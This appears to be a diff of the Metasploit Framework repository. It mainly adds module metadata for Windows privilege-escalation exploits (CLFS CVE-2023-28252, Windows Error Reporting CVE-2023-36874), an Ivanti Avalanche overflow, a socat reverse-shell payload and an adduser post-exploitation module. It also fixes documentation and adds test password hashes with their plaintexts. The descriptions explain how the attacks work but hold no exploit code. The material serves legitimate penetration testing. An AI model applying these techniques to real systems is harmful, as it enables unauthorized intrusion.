+    ],
+    "rank": 400,
+    "disclosure_date": "2023-04-11",
+    "type": "exploit",
+    "author": [
+      "Ricardo Narvaja",
+      "Esteban.kazimirow",
+      "jheysel-r7"
+    ],
+    "description": "A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on\n            Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.\n\n            The clfs.sys driver contains a function CreateLogFile that is used to create\n            open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which\n            contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a\n            .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with\n            WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.\n\n            This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique\n            mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of\n            bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe\n            that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially\n            crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.\n\n            The exploits creates a controlled memory space by first looping over the CreatePipe function to\n            to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of\n            pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the\n            0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.\n\n            This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in\n            depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).",
+    "references": [
+      "CVE-2023-28252",
+      "URL-https://github.com/fortra/CVE-2023-28252"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2023-09-11 13:10:57 +0000",
+    "path": "/modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/cve_2023_28252_clfs_driver",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "exploit_windows/local/dnsadmin_serverlevelplugindll": {
    "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation",
    "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll",
@@ -164043,6 +166016,64 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_windows/local/win_error_cve_2023_36874": {
+    "name": "Microsoft Error Reporting Local Privilege Elevation Vulnerability",
+    "fullname": "exploit/windows/local/win_error_cve_2023_36874",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-11",
+    "type": "exploit",
+    "author": [
+      "Filip Dragović (Wh04m1001)",
+      "Octoberfest7",
+      "bwatters-r7"
+    ],
+    "description": "This module takes advantage of a bug in the way Windows error reporting opens the report\n          parser.  If you open a report, Windows uses a relative path to locate the rendering program.\n          By creating a specific alternate directory structure, we can coerce Windows into opening an\n          arbitrary executable as SYSTEM.\n          If the current user is a local admin, the system will attempt impersonation and the exploit will\n          fail.",
+    "references": [
+      "CVE-2023-36874",
+      "URL-https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/",
+      "URL-https://github.com/Wh04m1001/CVE-2023-36874",
+      "URL-https://github.com/Octoberfest7/CVE-2023-36874_BOF"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2023-09-27 09:43:32 +0000",
+    "path": "/modules/exploits/windows/local/win_error_cve_2023_36874.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/win_error_cve_2023_36874",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell",
+      "powershell"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_windows/local/windscribe_windscribeservice_priv_esc": {
    "name": "Windscribe WindscribeService Named Pipe Privilege Escalation",
    "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc",
@@ -167991,6 +170022,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/ivanti_avalanche_mdm_bof": {
+    "name": "Ivanti Avalanche MDM Buffer Overflow",
+    "fullname": "exploit/windows/misc/ivanti_avalanche_mdm_bof",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-14",
+    "type": "exploit",
+    "author": [
+      "Ege BALCI egebalci <Ege BALCI egebalci@pm.me>",
+      "A researcher at Tenable"
+    ],
+    "description": "This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.\n          An attacker can send a specially crafted message to the Wavelink Avalanche Manager,\n          which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.\n          This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.\n          The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.\n          Upon successful exploitation the attacker gains full access to the target system.\n\n          This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.",
+    "references": [
+      "CVE-2023-32560",
+      "URL-https://www.tenable.com/security/research/tra-2023-27",
+      "URL-https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": 1777,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Ivanti Avalanche <= v6.4.0.0"
+    ],
+    "mod_time": "2023-09-04 16:46:14 +0000",
+    "path": "/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/ivanti_avalanche_mdm_bof",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/misc/landesk_aolnsrvr": {
    "name": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow",
    "fullname": "exploit/windows/misc/landesk_aolnsrvr",
@@ -170394,7 +172477,7 @@
    "targets": [
      "MySQL on Windows prior to Vista"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-08-17 19:07:28 +0000",
    "path": "/modules/exploits/windows/mysql/mysql_mof.rb",
    "is_install_path": true,
    "ref_name": "windows/mysql/mysql_mof",
@@ -170438,7 +172521,7 @@
    "targets": [
      "MySQL on Windows"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-08-17 19:07:28 +0000",
    "path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
    "is_install_path": true,
    "ref_name": "windows/mysql/mysql_start_up",
@@ -171810,7 +173893,7 @@
      "Execute payload (x64)",
      "Neutralize implant"
    ],
-    "mod_time": "2020-01-29 13:16:02 +0000",
+    "mod_time": "2023-09-15 16:42:03 +0000",
    "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/rdp_doublepulsar_rce",
@@ -171829,6 +173912,9 @@
      ],
      "Reliability": [
        "repeatable-session"
+      ],
+      "SideEffects": [
+
      ]
    },
    "session_types": false,
@@ -175066,7 +177152,7 @@
      "Execute payload (x64)",
      "Neutralize implant"
    ],
-    "mod_time": "2020-05-07 20:22:56 +0000",
+    "mod_time": "2023-09-15 16:40:22 +0000",
    "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/smb_doublepulsar_rce",
@@ -175086,6 +177172,9 @@
      ],
      "Reliability": [
        "repeatable-session"
+      ],
+      "SideEffects": [
+
      ]
    },
    "session_types": false,
@@ -189090,6 +191179,42 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_cmd/unix/reverse_socat_tcp": {
+    "name": "Unix Command Shell, Reverse TCP (via socat)",
+    "fullname": "payload/cmd/unix/reverse_socat_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "jheysel-r7"
+    ],
+    "description": "Creates an interactive shell via socat",
+    "references": [
+
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-09-06 15:52:56 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/reverse_socat_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/reverse_socat_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_cmd/unix/reverse_socat_udp": {
    "name": "Unix Command Shell, Reverse UDP (via socat)",
    "fullname": "payload/cmd/unix/reverse_socat_udp",
@@ -213627,7 +215752,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/stagers/java/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/meterpreter/bind_tcp",
@@ -213749,7 +215874,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/stagers/java/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/meterpreter/reverse_tcp",
@@ -213788,7 +215913,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/stagers/java/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/shell/bind_tcp",
@@ -213827,7 +215952,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/stagers/java/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/shell/reverse_tcp",
@@ -213866,7 +215991,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/singles/java/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/shell_reverse_tcp",
@@ -235505,7 +237630,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-08-22 12:36:48 +0000",
    "path": "/modules/post/linux/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkvm",
@@ -236465,6 +238590,52 @@
    ],
    "needs_cleanup": null
  },
+  "post_linux/manage/adduser": {
+    "name": "Add a new user to the system",
+    "fullname": "post/linux/manage/adduser",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Nick Cottrell <ncottrellweb@gmail.com>"
+    ],
+    "description": "This command adds a new user to the system",
+    "references": [
+
+    ],
+    "platform": "AIX,BSD,Linux,Solaris,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-10-25 19:28:23 +0000",
+    "path": "/modules/post/linux/manage/adduser.rb",
+    "is_install_path": true,
+    "ref_name": "linux/manage/adduser",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": null
+  },
  "post_linux/manage/disable_clamav": {
    "name": "Disable ClamAV",
    "fullname": "post/linux/manage/disable_clamav",
@@ -241613,9 +243784,11 @@
      "Carlos Perez <carlos_perez@darkoperator.com>",
      "Aaron Soto <aaron_soto@rapid7.com>"
    ],
-    "description": "This module attempts to determine whether the system is running\n          inside of a virtual environment and if so, which one. This\n          module supports detection of Hyper-V, VMWare, Virtual PC,\n          VirtualBox, Xen, and QEMU.",
+    "description": "This module attempts to determine whether the system is running\n          inside of a virtual environment and if so, which one. This\n          module supports detection of Hyper-V, VMWare, VirtualBox, Xen, QEMU,\n          and Parallels.",
    "references": [
-
+      "URL-https://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf",
+      "URL-https://www.heise.de/security/downloads/07/1/1/8/3/5/5/9/vmde.pdf",
+      "URL-https://evasions.checkpoint.com/techniques/registry.html"
    ],
    "platform": "Windows",
    "arch": "",
@@ -241623,7 +243796,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-29 21:28:15 +0000",
+    "mod_time": "2023-08-11 14:42:51 +0000",
    "path": "/modules/post/windows/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/checkvm",
@@ -245800,7 +247973,7 @@
    "author": [
      "Joshua Abraham <jabra@rapid7.com>"
    ],
-    "description": "This module will enumerate computers included in the primary Domain.",
+    "description": "This module will enumerate computers included in the primary Active Directory domain.",
    "references": [

    ],
@@ -245810,7 +247983,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-10-12 10:59:29 +0000",
    "path": "/modules/post/windows/gather/enum_computers.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_computers",
@@ -245818,9 +247991,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "powershell",
+      "shell"
    ],
    "needs_cleanup": null
  },
@@ -12,14 +12,14 @@ if [ "$MSF_UID" -eq "0" ]; then
 else
  # if the users group already exists, create a random GID, otherwise
  # reuse it
-  if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
+  if ! getent group $MSF_GID > /dev/null; then
    addgroup -g $MSF_GID $MSF_GROUP
  else
    addgroup $MSF_GROUP
  fi

  # check if user id already exists
-  if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
+  if ! getent passwd $MSF_UID > /dev/null; then
    adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
    # add user to metasploit group so it can read the source
    addgroup $MSF_USER $METASPLOIT_GROUP
@@ -93,7 +93,7 @@ One advantage that this directory structure gives us is the ability to write bet

 ### Shared build tasks

-Because all routine module-oriented tasks will be preformed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:
+Because all routine module-oriented tasks will be performed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:

 ```
 rake run -- Start module, hook up stdin/stdout to JSON-RPC
@@ -115,4 +115,4 @@ At the very least, we will also need tooling to create a mostly-empty but runnab

 ### For classic modules

-The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
+The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)|
 | [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc)|
 | [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)|
 | [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
@@ -28,7 +28,7 @@ Difficulty: 3/5

 ### Enhance Sql Injection Support

-Enable faster implementation of SQL injection based explot modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.
+Enable faster implementation of SQL injection based exploit modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.

 Difficulty: 3/5

@@ -6,7 +6,7 @@ Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://g

 ### Retain active status of authentication tokens

-Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for regstering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
+Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.

 Difficulty: 2/5

@@ -31,7 +31,7 @@ Difficulty: 3/5

 ### Enhanced LDAP Query & Collection

-When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 
+When performing security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 

 Size: Medium/Large (Depends on proposal)  
 Difficulty: 3/5
@@ -84,6 +84,7 @@ This section will cover the differences between the two crackers.  This is not a
 | md5 (raw, unicode)          | Raw-MD5u                                               | 30 (with an empty salt)                                        |
 | NetNTLMv1                   | netntlm                                                | 5500                                                           |
 | NetNTLMv2                   | netntlmv2                                              | 5600                                                           |
+| pbkdf2-sha256               | PBKDF2-HMAC-SHA256                                     | 10900                                                          |

 While Metasploit standardizes with the JtR format, the hashcat [library](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/password_crackers/cracker.rb) includes the `jtr_format_to_hashcat_format` function to translate from jtr to hashcat.

@@ -141,7 +142,7 @@ creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D48
 creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
 creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
 creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-## oracle (10) uses usernames in the hashing, so we can't overide that here
+## oracle (10) uses usernames in the hashing, so we can't override that here
 creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
 creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
 ## oracle 11/12 H value, username is used
@@ -149,47 +150,48 @@ creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C
 ## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb
 creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
 creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-## postgres uses username, so we can't overide that here
+## postgres uses username, so we can't override that here
 creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
 ## other
 creds add user:hmac_password hash:'<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9' jtr:hmac-md5
 creds add user:vmware_ldap hash:'$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6' jtr:dynamic_82
+creds add user:admin hash:'$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU' jtr:pbkdf2-sha256
 ```

 This data breaks down to the following table:

-| Hash Type                            | Username           | Hash                                                                                                                                                                                                                                                                   | Password     | jtr format       | Modules which dump this info                     | Modules which crack this                                  |
-| ------------------------------------ | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | ---------------- | ------------------------------------------------ | --------------------------------------------------------- |
-| -----------                          | ----------         | ------                                                                                                                                                                                                                                                                 | ----------   | ------------     | ------------------------------                   | -------------------------                                 |
-| DES                                  | des_password       | `rEK1ecacw.7.c`                                                                                                                                                                                                                                                        | password     | des              |                                                  | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux |
-| MD5                                  | md5_password       | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/`                                                                                                                                                                                                                                   | password     | md5              |                                                  | auxiliary/analyze/crack_linux                             |
-| BSDi                                 | bsdi_password      | `_J9..K0AyUubDrfOgO4s`                                                                                                                                                                                                                                                 | password     | bsdi             |                                                  | auxiliary/analyze/crack_linux                             |
-| SHA256                               | sha256_password    | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5`                                                                                                                                                                                                              | password     | sha256,crypt     |                                                  | auxiliary/analyze/crack_linux                             |
-| SHA512                               | sha512_password    | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1`                                                                                                                                                                   | password     | sha512,crypt     |                                                  | auxiliary/analyze/crack_linux                             |
-| Blowfish                             | blowfish_password  | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe`                                                                                                                                                                                                         | password     | bf               |                                                  | auxiliary/analyze/crack_linux                             |
-| Lanman                               | lm_password        | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | lm               |                                                  | auxiliary/analyze/crack_windows                           |
-| NTLM                                 | nt_password        | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | nt               |                                                  | auxiliary/analyze/crack_windows                           |
-| NetNTLMv1                            | u4-netntlm         | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c`                                                                                                                                   | hashcat      | netntlm          |                                                  | auxiliary/analyze/crack_windows                           |
-| NetNTLMv2                            | admin              | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030`                                                                                       | hashcat      | netntlmv2        |                                                  | auxiliary/analyze/crack_windows                           |
-| MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05          | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql            | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
